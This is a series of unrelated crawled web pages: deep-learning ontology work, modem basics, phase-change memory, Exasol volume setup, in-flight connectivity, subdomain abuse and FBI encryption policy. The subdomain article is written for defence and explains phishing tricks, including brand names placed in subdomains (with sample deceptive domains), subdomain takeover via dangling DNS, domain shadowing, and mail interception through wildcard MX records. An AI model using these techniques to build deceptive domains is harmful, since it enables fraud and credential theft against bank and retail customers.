- Scalable semantic indexing and discovery in the fused data space, including geospatial and SPARQL query capabilities
- Customization of deep learning content models for text, overhead imagery, and full-motion video
- Detection of inconsistencies and anomalies across data sources
- Automatic suggestions for missing metadata values
- Extraction, disambiguation, and resolution of types, topics, and named entities from unstructured text
Let's take a closer look at some of this work.
Deep Content Models
In the past decade, deep learning has generated much excitement in the machine learning community and beyond. Compared with older models that require more manual intervention and produce inferior results, deep neural networks now boast state-of-the-art performance in a wide variety of fields, including image recognition, natural language processing, machine translation, knowledge base completion, and reinforcement learning. Many deep learning algorithms are fundamentally feature learning algorithms that represent data within multi-dimensional vector spaces, also known as embedding spaces. For example, convolutional neural networks learn high-level features that encode the content of images, while word2vec (developed at Google but publicly available) learns compact vectors that encapsulate the distributional meanings of words. These representations enable robust data fusion across domains and support downstream modeling, which facilitates the expansion and alignment of existing ontologies. The foundation of our modeling approach is to produce high-quality data representations that are directly derived from the content without requiring extensive manual engineering of features. The advantages are twofold: the models capture the rich semantics of the data within each domain or modality, and they also produce compact encodings that are amenable to fusion and additional modeling. Over the past several years, GA-CCRi has researched and developed a variety of novel software solutions for several customers. As a part of these efforts, we have applied convolutional neural networks (CNNs) to both text and overhead imagery.
CNNs are well known for their ability to successfully learn features across multiple layers of increasing abstraction, and they are currently the state-of-the-art models for several machine learning tasks, especially scene understanding and speech recognition. More recently, GA-CCRi has also done work for one customer involving caption generation for full-motion video. Following the latest results in the scientific literature, our approach applies a CNN to each frame of the video, incorporating information about the optical flow, and then feeds the representation to a long short-term memory (LSTM) recurrent neural network. The LSTM takes sequential data as input and generates responses by combining the most recent input with long-range history, producing sentence captions for video.
Embedding models seek to address the challenge of disparate (big) data directly by using a deep learning process to leverage all inputs into a single learned numeric signature per entity. This learning step has the benefit of both compressing potentially large, raw inputs to a fixed size for use in bandwidth-constrained environments and making diverse input data equally accessible to the full gamut of conventional machine learning techniques. Embedding spaces are also amenable to modeling explicit transformations between them. This approach provides a powerful tool for domain transfer and data fusion. Examples of such mappings include:
- Fusion of disparate text sources
- Fusion of disparate knowledge graphs
- Fusion of overhead imagery with structured geospatial data
- Fusion of full-motion video with text
- Machine translation between languages
The ontology alignment problem can also be viewed through the lens of machine translation. Given a small amount of training data, it is possible to learn mappings between different ontologies or map them into a shared semantic space. By using the automatically-generated ontology as the target space, we can expand and merge manually-crafted ontologies while taking advantage of predefined structures. This process also enables detection of inconsistencies and anomalies among the various schema. GA-CCRi has leveraged this neural network fusion technology for two recent projects. For one of these, we have prototyped a system that learns representation vectors for entities in a large knowledge graph to enable fusion so that a data model can be maintained efficiently across distributed cloud nodes. Our approach to enabling this is to learn content vectors for each entity using a multitask learning approach. The core model in this approach learns from RDF statements: subject-predicate-object triples about entities in a large database. The model learns by first assigning a randomly initialized content vector to each entity and predicate and then using the TransE model to predict whether each statement is actually a true statement in the knowledge base or not. Fusion of the learned knowledge across the machines is done only at the model level: model weight updates are shared between the two machines, but none of the training data is shared. The cost of sharing the model weights is insignificant relative to sharing the raw data.
The other neural network fusion project leverages multi-modal datasets provided by the customer. Within this project, GA-CCRi developed the capability to address both the scalability and the distribution of image processing on large remote sensing data sets. A portion of this effort focused on the exploitation of overhead imagery for data fusion.
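To illustrate the TransE scoring idea mentioned above, here is a minimal numerical sketch. It is purely hypothetical: the vectors are random stand-ins rather than learned embeddings, and the code is not taken from the GA-CCRi system.

import numpy as np

rng = np.random.default_rng(0)
dim = 50
subject = rng.normal(size=dim)    # embedding of the subject entity
predicate = rng.normal(size=dim)  # embedding of the predicate (relation)
obj = rng.normal(size=dim)        # embedding of the object entity

# TransE models a true triple (s, p, o) as s + p being close to o, so a
# smaller distance means the statement is scored as more plausible.
distance = np.linalg.norm(subject + predicate - obj)
print(f"TransE distance (lower is more plausible): {distance:.3f}")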
Originally, this framework was born out of the need to extract image-specific information content in support of a larger data fusion effort. The targeted fusion effort aimed to leverage embedding models to relate disparate data sources (for example, imagery, text, geographic, and temporal sensor data) in the face of expanding data volumes.
Knowledge Discovery and Federated Search
Fused embedding spaces are also useful for answering questions that are directly relevant to analysts and domain experts. GA-CCRi has developed scalable search tools over embedding spaces for various modalities, supporting free text, geospatial, and SPARQL queries, among others. We can also provide supporting feedback evidence to the user in order to increase their confidence in the model. For example, if a document is returned that contains no terms matching the query, the model automatically displays the closest semantic matches between important terms in the document and the query. GA-CCRi's Large Scale Semantic Discovery with Neural Content Models project addresses problems associated with manual content curation for information retrieval: inconsistencies in tag assignment, inaccurate tagging, scalability problems, and federated search across fused data sets. By replacing this manual metadata assignment with the use of deep neural networks that analyze both content and metadata and represent their semantics using embedded vector models, the system can perform tasks such as part-of-speech tagging, word-sense disambiguation, and entity extraction. The use of CNNs adds the ability to automatically generate such metadata from images, and the use of embedding vectors for this metadata means that metadata from images, text, and other media can be combined for easier cross-media research. To further improve the metadata used to drive analyst information retrieval, these techniques enable the inference of missing metadata values, the identification of anomalous tags, and the extraction and categorization of named entities from text as additional metadata. The implementation of the system on cloud-based servers provides scalability of storage and processing to go with the greater scalability of automated metadata assignment over manual metadata assignment.
Natural Language Processing and Mapping
A distinguishing feature of semantic vector spaces is the ability to group entities together by similarity in a continuous, automated way and to model various relations as transformations of the underlying space. In particular, the nearest-neighbor relation provides a latent encoding of various subtle and fine-grained attributes. For example, the vector for Putin lies near the vectors for related entities such as Russia, Moscow, and Kremlin. Moreover, simple algebraic operations on the vector space can be used to complete analogies to some extent. For example, the difference between the vectors for Russia and Putin is similar to the difference between the vectors for Syria and Assad. These processes can be used to uncover unexpected and surprising correlations that are not explicitly contained in the source data, such as latent power structures within organizations. For semantic representations of text and graphs, GA-CCRi has implemented a version of Google's well-known SkipGram algorithm. This model enables us to represent the meanings of words, as well as nodes in a graph—for example, documents linked to metadata, or RDF data derived from geospatial sources.
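A small, hedged sketch of the nearest-neighbor and analogy behavior described above: it assumes the gensim package and a publicly downloadable pre-trained word2vec model, the exact neighbors returned will vary with the model and its vocabulary, and it is not GA-CCRi's implementation.

import gensim.downloader as api

# Load pre-trained word2vec vectors (a large download on first use).
model = api.load("word2vec-google-news-300")

# Nearest neighbors: related entities cluster together in the embedding space.
print(model.most_similar("Putin", topn=5))

# Analogy via vector arithmetic: Russia - Putin + Assad should land near Syria.
print(model.most_similar(positive=["Russia", "Assad"], negative=["Putin"], topn=3))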
Embedding vectors are also convenient for training additional supervised models, for example to rank anomalous entities relative to a given criterion or to suggest a value for a missing item along with a confidence score. GA-CCRi has developed such capabilities, including knowledge base augmentation, metadata suggestion, and entity categorization.

In recent work, GA-CCRi has also been developing a capability for automated creation of latent type systems using embeddings, geared toward text-mining tasks such as topic extraction, type inference, and entity disambiguation and resolution. In particular, we are able to suggest new classes to extend an ontology based on new data. Ontologies generated by neural language models have the advantage of containing both discrete and continuous representations, which allows them to efficiently encode semantic signatures of entities and relationships in a way that can feed downstream logical processes.

The image above shows an automatic type clustering of words. Each cluster centroid is labeled with the closest word in embedding space. At this high level, we see the separation of nouns, verbs, adjectives, and proper nouns, along with some finer topical distinctions. By repeating this process with higher-resolution clusterings, we obtain a latent hierarchy of subtypes: for example, the set of proper nouns contains the set of location names, which in turn contains names of countries and cities, and so forth. This same technique will be very useful in automated ontology generation.

In order to fully exploit the information in this hierarchy, it is critical to disambiguate terms according to the contexts in which they occur. For example, the image below shows disambiguation of mentions of the term Jordan across documents. Note that the model is able to distinguish not only different broad entities (for example, Jordan the basketball player vs. Jordan the country) but also different topical usages of the same entity, such as political vs. economic mentions of the country Jordan.

This ability to generate ontologies is a good example of how GA-CCRi often applies different kinds of neural networks together to solve a larger problem. In this case, the data fusion, knowledge discovery, federated search, natural language processing, and disambiguation capabilities can all work together to create an ontology that is more than just labeled clusters of similar words. These techniques draw on the latent semantics of the terms in a document collection to create a more meaningful ontology that can help users navigate those collections better and get more value from those documents.
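As a hedged illustration of the multi-resolution clustering step described above (not GA-CCRi's actual pipeline), the sketch below clusters embedding vectors with scikit-learn and labels each cluster with the vocabulary item nearest its centroid. The vocabulary and random vectors are placeholders for real learned embeddings.

```python
import numpy as np
from sklearn.cluster import KMeans

# Placeholder data: `vectors` would be learned word embeddings and `vocab` the words.
rng = np.random.default_rng(1)
vocab = ["france", "spain", "paris", "madrid", "run", "walk", "red", "blue"]
vectors = rng.normal(size=(len(vocab), 50))

def label_clusters(vectors, vocab, k):
    """Cluster embeddings and label each cluster with the word nearest its centroid."""
    km = KMeans(n_clusters=k, n_init=10, random_state=0).fit(vectors)
    labels = {}
    for c in range(k):
        members = np.where(km.labels_ == c)[0]
        dists = np.linalg.norm(vectors[members] - km.cluster_centers_[c], axis=1)
        labels[c] = vocab[members[np.argmin(dists)]]
    return km.labels_, labels

# A coarse pass and then a finer pass, approximating a latent type hierarchy.
coarse_ids, coarse_names = label_clusters(vectors, vocab, k=2)
fine_ids, fine_names = label_clusters(vectors, vocab, k=4)
print(coarse_names, fine_names)
```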
<urn:uuid:6ec988ab-0859-475c-8671-a32fcb263372>
CC-MAIN-2022-40
https://www.ga-ccri.com/deep-learning-ontology-development
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00452.warc.gz
en
0.914607
2,489
2.796875
3
These days, we completely depend on the Internet rather than merely using it. Our entire day could be wrecked by a delayed or, worse, nonexistent connection. However, have you ever paused to consider how this connection functions?

Your modem acts as a translator between the many digital languages that your home network’s components, such as the Wi-Fi router and mobile devices, speak. It converts the signals sent by your Internet Service Provider, or ISP, into an Internet connection that your Wi-Fi router can transmit. Your modem provides you with basic Internet connectivity, but it can also significantly impact how effectively your home Wi-Fi operates.

What is the difference between a router and a modem?

If you have been using the Internet for some time, you have probably heard the terms “modem” and “router” used, but you may not have given them much thought. Don’t worry; we are here to help. Simply put, your router establishes a network among the computers in your home, and your modem links those computers to the internet. Your router, which directs traffic between the internet and your computer, is what you actually connect to when you use Wi-Fi. Many internet service providers, like Optimum, give you the chance to rent both a router and a modem for your convenience. Optimum in particular also offers a smart router that promises greater efficiency.

Now that you are aware of the difference between a modem and a router, let us move forward and elaborate on the uses of a modem.

Use of a Modem for an Internet Connection

As you may already be aware, a modem is a typical piece of network equipment that establishes a connection between a computer and the Internet. However, there are various types of modems on the market, and you may be curious as to how they differ. We hope that after reading this article you will have a better grasp of DSL, cable, and dial-up modems.

- DSL modem: A DSL modem is a network device that connects your computer to the Internet via a DSL connection. These days, it is quite common to find routers with a built-in DSL modem, allowing many PCs to connect to the Internet simultaneously.
- Cable modem: If you wish to establish a high-speed cable Internet connection, you must have a cable modem, and cable TV providers typically offer this option. You may not always need a separate cable modem because some newer set-top boxes are equipped with cable modem functionality. In contrast to DSL, which uses the telephone network, cable Internet uses the cable TV network.
- Dial-up modem: A dial-up modem is used to connect a computer or laptop to the Internet over a telephone line. Although it is no longer widely used because of its relatively sluggish transmission speed (up to 56 Kbps), it is still used in rural regions where there are no better options, or as a backup link. Additionally, most dial-up modems can be connected to fax machines in order to send and receive faxes.

The features of an internet modem

An internet modem both sends data to and receives data from your ISP. The modem’s transmission function converts data into phone line-compatible signals, and its receiving function demodulates received data back into digital data.

The functions of an internet modem

Below are a few of the key responsibilities of an internet modem:

- Transmission of signals: An internet modem’s primary duty is to send signals to other internet modems.
  Additionally, it decodes all signals, enabling the transmission of digital data between nodes.
- Compression of data: Internet modems use data compression to reduce the time it takes to send and receive data and the percentage of errors that occur during signal transmission. Compression also reduces the size of the signals needed to transfer the data.
- Flow control: Each internet modem sends signals at a different rate, which can cause problems when modems exchange data. With flow control, the faster modem pauses when a slower modem is sending to it, giving the slower modem time to catch up so that data transmission can continue.

What are the uses of an internet modem?

- Customers may use credit or debit cards to make purchases without being aware that modems play a significant part in transferring that data and receiving confirmation of it. Modems are used in ATMs, in ticketing devices at airports, railway stations, and other locations, and for hotel or mall payments.
- Modems are also used in remote locations to save travel expenses, time, and money: for instance, at gas stations, in call centers for coolers, in inventory management for vending machines, and in timing management for stoplights.
- Internet modems are also used for automatic communication between two pieces of equipment, such as when medical devices transmit patients' test results to their doctors' computers.

In a nutshell, internet modems are used to transfer data between different devices. A modem acts as a decoder, converting incoming signals for digital devices, and as an encoder, preparing data for transmission to other internet modems. We hope this article succeeded in providing all the information that you needed about modems and internet modems in particular.
<urn:uuid:bbb55426-539a-4585-847c-ac611d22279c>
CC-MAIN-2022-40
https://latesthackingnews.com/2022/09/07/how-does-an-internet-modem-work/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00652.warc.gz
en
0.934063
1,113
2.953125
3
A new chip technology could encroach on flash memory and hard-disk drive market share, as a group of companies led by IBM explores phase-change memory. Big Blue, Macronix and Qimonda on Monday announced joint research results that give a major boost to this new type of computer memory, which they are touting as the successor to flash memory chips. Flash memory is widely used in computers and consumer electronics, including digital cameras and portable music players.

Scientists designed, built and demonstrated a prototype phase-change memory device that switched more than 500 times faster than flash while using less than one-half the power to write data into a cell. The device's cross-section is a minuscule 3 by 20 nanometers in size, which is far smaller than flash and is equivalent to the industry's chipmaking capabilities targeted for 2015.

"These results dramatically demonstrate that phase-change memory has a very bright future," said Dr. T. C. Chen, vice president, science and technology at IBM Research. "Many expect flash memory to encounter significant scaling limitations in the near future. Today, we unveil a new phase-change memory material that has high performance even in an extremely small volume. This should ultimately lead to phase-change memories that will be very attractive for many applications."

Changing the Tide

Phase-change memory appears to be much faster and can be scaled to dimensions smaller than flash memory — enabling future generations of high-density nonvolatile memory devices as well as more powerful electronics, according to the companies. Nonvolatile memories do not require electrical power to retain their information. By combining nonvolatility with good performance and reliability, phase-change technology may also enable a path toward a universal memory for mobile applications, the companies said.

On the Drawing Board

Unlike flash, phase-change memory technology can improve as it gets smaller with Moore's Law advancements. Phase-change memory, as well as some other nonvolatile memory technologies, has been on the drawing board for some time, according to Rob Lineback, a senior market research analyst at IC Insights.

"As you start to shrink some of the parts of the cell of flash memory, it can no longer hold the charge, at least over a 10-year period, and there is always a desire to have something that writes and reads data faster. That's why these technologies are being pursued," Lineback told TechNewsWorld.

New Material Makes It Possible

A new alloy material makes phase-change technology possible. The fastest and most economical memory designs — SRAM and DRAM, respectively — use inherently leaky memory cells that must be powered continuously. These "volatile" memories lose their stored information whenever their power supply is interrupted. The pressure is on to discover a nonvolatile memory because most semiconductor makers agree that flash will eventually become less viable. Intel, among others, is also working on nonvolatile memory.

"It seems like every time that people think flash is going to run out of steam, companies find a way to extend flash," Lineback said. "This is a promising development, but it will be a couple of generations — three to six years — before we see if it's going to be any major force in the marketplace."
<urn:uuid:39278241-060c-4c21-a76b-1612bea7b5ae>
CC-MAIN-2022-40
https://www.linuxinsider.com/story/ibm-boosts-development-of-flash-memory-successor-54665.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00652.warc.gz
en
0.93789
692
2.625
3
Data volumes contain the database data. For more information on volumes, refer to the Volumes Overview section.

Assigning Nodes to a Volume

When creating a storage volume, you set the number of master nodes the volume will use and assign the master nodes to the volume. Master nodes are the active nodes in a cluster. For example: in a cluster that will have 4 active nodes and 1 reserve node (a '4+1' setup), the number of master nodes is 4.

The following principles apply:

- The value you set in the Number of Master Nodes field of the Add EXAStorage Volume screen must match the number of nodes you add to the volume's Nodes List.
- The number of master nodes that you define for the volume must match the number of active nodes you assign to the database later when you Create a Database.

Follow these steps to create a data volume:

- In EXAoperation, go to Services > EXAStorage and click Add Volume.
- Enter the properties for the new volume, and set the Volume Type to Data.
- Click Add to create the volume. The volume is added to EXAStorage.

|Redundancy||The number of copies there are of a data segment. For example, a redundancy of '2' means that there will be two instances of a specific segment of data, stored on separate nodes in the cluster.|
|Label||A descriptive name for the volume.|
|Allowed Users||The users who are permitted to access the volume. These users are able to perform tasks such as backup scheduling, creating databases, etc.|
|Read-only Users||Users who should have read-only access. Any users that you add as Read-only Users are limited to read-only access, even if they are added to the Allowed Users list.|
|Priority||The priority of the volume in terms of process scheduling priority. A higher number specifies a higher priority. You can use this setting if you have two volumes (and thus two databases) running on the same disks to give one of the databases priority for processing requests. For most cases, you can set the priority to a value of '10' for all volumes.|
|Volume Type||Specifies if the volume is a data volume or an archive volume.|
|Volume Size (GiB)||The maximum size of the data volume in GiB.|
|Nodes List||The nodes that the volume will use.|
|Number of Master Nodes||The number of active nodes in the cluster. The number you enter in this field must match the number of nodes added in the Nodes List. The number of master nodes that you define for the volume must match the number of active nodes you assign to the database later when you create the Exasol database instance.|
|Block Size (KiB)||Size of the data blocks for the database in KiB.|
|Disk||The storage disk that the volume will be stored on.|
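Volume creation happens in the EXAoperation web interface, so the snippet below is only a hypothetical helper (not part of any Exasol tooling) that encodes the two principles above, so an automation script could fail fast before attempting to create a mismatched volume. The node names are placeholders.

```python
# Hypothetical pre-flight check, not an Exasol API: it only encodes the rule that the
# Number of Master Nodes must equal the number of nodes in the Nodes List, and that the
# database's active node count must later match the volume's master node count.
def validate_volume_spec(nodes_list, num_master_nodes, active_db_nodes):
    if num_master_nodes != len(nodes_list):
        raise ValueError(
            f"Number of master nodes ({num_master_nodes}) must match the "
            f"nodes list ({len(nodes_list)} nodes)."
        )
    if active_db_nodes != num_master_nodes:
        raise ValueError(
            f"Active database nodes ({active_db_nodes}) must match the "
            f"volume's master node count ({num_master_nodes})."
        )
    return True

# A '4+1' cluster: four active (master) nodes; the reserve node is not listed.
validate_volume_spec(nodes_list=["n0011", "n0012", "n0013", "n0014"],
                     num_master_nodes=4, active_db_nodes=4)
```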
<urn:uuid:6bd24671-878d-4ff7-bd6a-ea19989861bc>
CC-MAIN-2022-40
https://docs.exasol.com/db/7.0/administration/azure/manage_storage/create_data_volume.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00652.warc.gz
en
0.811872
640
3.21875
3
For years, stepping on a flight meant a guaranteed loss of internet connectivity. Insufficient bandwidth, lagging video streaming, and webpage timeouts made in-flight surfing or downloading a frustrating experience. However, air-to-ground tracking has revolutionized the availability of internet connectivity in flight. Air-to-ground tracking works by establishing a series of ground stations along a designated path. Beam-forming antennas are placed at the sites to connect with properly outfitted planes flying overhead. Once a plane follows the path of these established ground stations, the air-to-ground tracking technology allows passengers to enjoy the high-bandwidth, low-latency connectivity previously only available to them in their homes. In flight, air-to-ground tracking can provide passengers with connectivity speeds of up to 100 Mbit/sec at altitudes of up to 45,000 feet. Air-to-ground tracking also helps planes maintain a consistent in-flight broadband experience. The longer the aircraft follows the established terrestrial stations, the longer passengers can enjoy the high-bandwidth speeds previously unrealized on commercial airplanes. In addition to increasing passenger and crew comfort on commercial flights, air-to-ground tracking can be used to download flight and aircraft data on the ground to support safety studies and preventive maintenance. By sharing this data in flight as opposed to between flights, operators have a better chance of catching mechanical failures or worn parts sooner, protecting passengers and crew from potential danger.
<urn:uuid:55d0963a-7325-4dfa-a9f4-b25bbdcd9339>
CC-MAIN-2022-40
https://www.extendingbroadband.com/aerial-tracking/air-ground-tracking/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00652.warc.gz
en
0.928782
306
3.171875
3
A web domain name is the foundational piece of internet property allowing its owner (registrant) to construct and host an associated website. On a domain, the owner is also able to construct whatever subdomains they wish—a process that is technically achieved via the configuration of records on the authoritative domain name system (DNS) server. A subdomain name is the part of the URL before the domain name, separated by a dot (e.g., “blog” in the URL https://blog.cscglobal.com/).

Subdomains can be used in the construction of web addresses for a number of different purposes, such as the creation of individual microsites for sub-brands or campaigns, or the production of region- or subject-specific subsites. Some internet service providers (ISPs), known as private subdomain registries, also offer the sale of specific commoditized subdomains of their site, allowing users to create their own sites (e.g., “second-level” domains such as blogspot.com, which allows users to register URLs in the form of username.blogspot.com, for the creation of a personalized blog in this case).

Subdomain name abuse in general internet content

From a brand monitoring point of view, the appearance of a brand name or other relevant keyword(s) in the subdomain name of a third-party URL can be associated with a variety of brand infringement types. Some areas of potential concern include:

- As a means of driving traffic to third-party content via misdirected search-engine queries
- Creating sites featuring claims of affiliation with the brand in question
- Reputation issues—e.g., creating sites containing information, customer comments, or activism-related material pertaining to a particular brand
- As a means of creating a URL appearing deceptively similar to that of an official brand site (e.g., for fraudulent activity, phishing, or the distribution of malware)

Brand-specific subdomains can be a source of confusion for internet users—and thus an effective threat vector—because of their similarity to familiar, legitimate URLs. For example, the hypothetical and unofficial domain cscglobal.blog.com could be used to create a convincing fake version of the official blog.cscglobal.com. In recent months, a number of (often SMS-based) phishing attacks have been observed to make use of a brand name in the subdomain name to create a highly convincing, deceptive URL in a particular way, as shown in the example in Figure 1.

Figure 1: Example of a 2021 SMS-based phishing attack targeting HSBC customers

In this example targeting U.K. customers of the bank, the phishing URL makes use of a reference to HSBC in the subdomain name, together with a domain name beginning with “uk-” (uk-account.help), as a means of producing a URL that appears visually very similar to the real “hsbc.co.uk/account-help.” The phishing site link also uses the HTTPS protocol, historically an indicator of trust, but now a characteristic shared by over 80% of phishing sites in response to the easy availability of secure sockets layer (SSL) certificates from free providers.

This approach is particularly effective for a number of reasons, including the fact that it uses a new generic top-level domain (gTLD) extension that may be unfamiliar to some users, and the tendency for the displays in mobile devices to insert line breaks after hyphens. Zone file analysis shows there are at least several hundred registered new gTLD domains with names of a similar format that have the potential to be used fraudulently.
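A simple way to operationalize this kind of check is to look for monitored brand terms inside a URL's subdomain labels. The sketch below is an illustrative heuristic only, not CSC's detection logic: the brand list is a placeholder, and the two-label assumption about the registered domain is a simplification that a real system would replace with a public-suffix-aware parser.

```python
from urllib.parse import urlsplit

# Illustrative heuristic: flag URLs where a monitored brand term appears in the
# subdomain labels rather than in the registered domain itself.
BRANDS = {"hsbc", "hermes", "o2"}  # placeholder watch list

def brand_in_subdomain(url):
    host = urlsplit(url).hostname or ""
    labels = host.lower().split(".")
    if len(labels) < 3:
        return None  # no subdomain labels to inspect
    registered = ".".join(labels[-2:])  # naive: assumes a two-label registered domain
    subdomain_labels = labels[:-2]
    hits = [b for b in BRANDS if any(b in label for label in subdomain_labels)]
    return {"registered_domain": registered, "brand_hits": hits} if hits else None

print(brand_in_subdomain("https://hsbc.uk-account.help/login"))  # flagged
print(brand_in_subdomain("https://blog.cscglobal.com/"))         # not flagged
```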
Identified examples include uk-authorization-online.support, uk-gov.tax, uk-insurance.claims, uk-border.agency, and uk-lottery.win. Other recent identified examples of branded subdomains in phishing scams include hermes.online-parcel-reschedule.com (for logistics company Hermes) and o2.billing9k7j.com (for telecommunications organization O2).

This type of attack circumvents the requirement for the fraudster to register a brand-specific domain name (which is potentially easier to detect by a brand owner employing a basic domain monitoring service). In many cases, the WHOIS records for the parent domains are anonymized, making it difficult to establish links between cases. These domains are also often registered immediately prior to the attack and are used for a short period in an effort to circumvent detection and takedown efforts.

In general, brand-related subdomains on third-party sites are more difficult to detect than domain names themselves, which can much more easily be identified through wildcard searches of registry zone files. The most straightforward method for identifying subdomains is through search engine metasearching, providing the subdomains in question are linked from other sites and have been indexed by the search engines. Beyond this, the issue can partially be addressed through the use of other techniques, such as a detailed analysis of domain name zone configuration information (e.g., passive DNS analysis), certificate transparency (CT) analysis, or via the use of explicit queries on particular domains for the existence of specific subdomain names.

Other issues include private subdomain registries being problematic because they're not necessarily regulated by the Internet Corporation for Assigned Names and Numbers (ICANN), and thus may lack dispute resolution procedures, abuse reporting processes, or records of any sort of WHOIS information.

When considering enforcement against infringing subdomains, options can be relatively limited—particularly in comparison with the range of approaches available for domain names. It's sometimes possible to achieve engagement with the registry, registrar, hosting provider or DNS provider, but they may not be obligated to comply. Furthermore, many established dispute processes, such as the Uniform Domain-Name Dispute-Resolution Policy (UDRP), don't necessarily apply to subdomains. However, exceptions do exist in some cases, such as certain new gTLDs, instances where the host domain name corresponds to a country code (e.g., jp.com), or other limited circumstances (e.g., those covered by the Dispute Resolution Service (DRS) for .NZ). Failing this, court litigation is often a last resort.

Finally, the use of fraudulent domains in conjunction with wildcard MX records (which allow the domain owner to receive emails sent to any subdomain on the domain name) can also be a highly efficient way for criminals to intercept mail intended for trusted organizations, and thereby harvest sensitive information. This can be successful in cases where the recipient email address has been mistyped (i.e., with an extra "." inserted). If the domain name is carefully selected, it can enable attacks against a range of different organizations (e.g., *.bank.[TLD] can be used to harvest mis-addressed emails intended for any organization with an official domain name of the form [brand]bank.[TLD]).
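Two of the techniques mentioned above, explicit queries for specific subdomain names and spotting wildcard MX configurations, can be sketched with the third-party dnspython package (2.x API assumed). The candidate labels and domain names below are placeholders, and this is a simplified illustration rather than a production monitoring tool.

```python
import dns.resolver  # third-party package: dnspython 2.x

CANDIDATE_LABELS = ["www", "mail", "login", "secure", "hsbc"]  # placeholder watch list

def existing_subdomains(domain):
    """Explicitly query a short list of candidate subdomain names on one domain."""
    found = []
    for label in CANDIDATE_LABELS:
        name = f"{label}.{domain}"
        try:
            dns.resolver.resolve(name, "A")
            found.append(name)
        except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
            pass
        except Exception:
            pass  # treat timeouts and other lookup errors as "not found" in this sketch
    return found

def has_wildcard_mx(domain):
    """If an almost certainly unregistered label still returns MX records,
    the zone very likely carries a wildcard MX entry."""
    try:
        dns.resolver.resolve(f"unlikely-label-20220101.{domain}", "MX")
        return True
    except Exception:
        return False

print(existing_subdomains("example.com"))
print(has_wildcard_mx("example.com"))
```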
Subdomains of official domains within the brand owner's own portfolio

Considering the domain security landscape, an area of primary concern for a brand owner is the existence of subdomains on domains under their own ownership. Brand owners may use subdomains of official sites for a number of different purposes, as discussed previously. However, when they register a lot of subdomains—IBM® has around 60,000 and Microsoft® over 120,000—subdomain management can become a significant endeavor. The associated risk is that bad actors can take over subdomains through exploitation of expired hosting services (an issue known as "dangling DNS records"), DNS misconfigurations, or untrustworthy legitimate users. Compromise can also be achieved using pharming (DNS poisoning) attacks, where subdomain records are modified to re-direct traffic to a fraudulent IP address. This can give fraudsters the ability to create fake sites, upload content, monitor traffic, or hack official corporate systems. A 2021 study identified over 1,500 vulnerable subdomains across 50,000 of the world's most important websites.

A number of news stories have emerged in recent years of corporations being attacked in this way, including instances of official corporate subdomains being hijacked to re-direct to content including malware, pornography, and gambling-related material. Subdomains of the Xerox website, for example, were used in 2020 to drive traffic to sites selling fake goods, taking advantage of the trusted reputation of the official corporate domain to boost the search-engine ranking of the malicious content. In another case in 2019, GoDaddy® shut down 15,000 abused subdomains that drove a massive spam campaign geared towards the sale of counterfeits. Brand owners can mitigate these threats by analyzing their own domain portfolio and being mindful of any subdomains pointing to external IP addresses.

Another risk is the possibility for criminals to create new, unofficial subdomains of official sites via DNS compromise through a method such as phishing or dictionary attacks—a practice known as "domain shadowing." This approach can also be used to drive users to threatening content, while taking advantage of the protections associated with being hosted on a trusted website (e.g., to circumvent site block listing). In one reported example of this practice, a number of domains (primarily registered through GoDaddy) were compromised to create over 40,000 subdomains pointing to Russian IP addresses hosting a range of malware variants. This type of attack can be difficult to detect, both because it avoids the requirement to make changes on the official corporate webserver, and because the infringing content is typically hosted externally. The damage may only become apparent following complaints by users, or in response to the official domain being added to a block list due to the malicious activity. Rigorous security measures are the primary preventative approach, including the use of strong passwords and two-factor authentication.

A related attack vector is the use of wildcard DNS records, which can result in any arbitrary subdomain name being set to re-direct to a malicious external IP address. Bad actors can use randomized, changing subdomains to circumvent hostname-based block listing (e.g., in coordinated phishing campaigns). This type of attack can be applied both to official (compromised) and third-party (stand-alone) domains.
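For a brand owner reviewing their own portfolio, one concrete starting point is to list each subdomain's CNAME target and flag targets that no longer resolve, since those are the classic "dangling DNS" takeover candidates. The sketch below (dnspython assumed, names are placeholders) illustrates the idea; a real review would also check provider-specific "unclaimed resource" responses and external IP ownership.

```python
import dns.resolver  # third-party package: dnspython 2.x

def dangling_cname_candidates(subdomains):
    """Rough dangling-DNS review: flag subdomains whose CNAME target does not resolve."""
    flagged = []
    for name in subdomains:
        try:
            target = dns.resolver.resolve(name, "CNAME")[0].target.to_text()
        except Exception:
            continue  # no CNAME record (or lookup failure); nothing to check here
        try:
            dns.resolver.resolve(target, "A")
        except Exception:
            flagged.append((name, target))  # CNAME points at something unresolvable
    return flagged

# Placeholder inventory of a brand owner's own subdomains.
print(dangling_cname_candidates(["shop.example.com", "old-campaign.example.com"]))
```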
Overall, to mitigate these threats, brand owners should employ a robust domain security posture combined with a comprehensive program of brand monitoring and enforcement.

We're ready to talk

If you'd like to talk to one of our specialists about domain monitoring and enforcement, or anti-fraud services, please complete our contact form.
<urn:uuid:83fea00a-9fe7-4213-a80c-0ddefae6f2b0>
CC-MAIN-2022-40
https://www.cscdbs.com/blog/the-world-of-the-subdomain/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00652.warc.gz
en
0.90891
2,269
3.34375
3
From a national security standpoint, encryption technologies stand to improve our ability to protect valuable personal information. However, leadership at the FBI apparently aims to dissuade people from using unbreakable encryption services that could protect their websites and computers. This stance could drastically reduce the security that assures people of the privacy necessary to maintain their personal and professional lives.

Jim Comey, the director of the FBI, spoke in front of the Appropriations Committee at the House of Representatives to urge Congress to pass legislation that would require tech companies to create backdoor access to any and all phones, computers and mobile devices that could otherwise be protected by encryption. "One of the things that the administration is working on right now is what would a legislative response look like that would allow us … with court process to get access to that evidence," Comey said.

Apple's decision to mandate encryption on all iPhones was a sea change in how tech companies protect their customers' private data. That decision irked many members of government and national security services, as mobile data access can improve the scope of surveillance programs administered by the National Security Agency and other government organizations.

